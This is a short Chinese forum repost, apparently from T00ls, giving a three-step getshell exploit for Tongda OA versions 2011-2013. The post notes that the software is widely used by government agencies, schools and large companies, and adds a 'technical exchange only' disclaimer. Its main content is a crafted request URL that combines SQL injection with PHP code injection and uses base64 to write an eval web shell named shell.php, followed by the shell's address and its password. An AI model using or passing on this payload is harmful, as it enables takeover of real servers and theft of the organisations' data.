通达OA 2011-2013 通杀GETSHELL

 转载自T00ls

此程序应用于非常多的政府机构, 教育机构, 以及各大一流公司(中国电信等)!
请各位看完本文后不要试图对任何使用本程序的网站进行破坏攻击入侵等…
本人发此贴纯属技术交流探讨, 并无怂恿别人去尝试攻击的意思!
若不接受以上条件的请自觉关闭, 由此产生的后果与作者(本人)无关!

EXP:

第一步:  

  
  
  
  
  1. http://ip/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))} 

第二步:

  
  
  
  
  1. http://ip/general/email/index.php 

第三步:

SHELL: http://ip/general/email/shell.php 密码C

你可能感兴趣的:(getshell)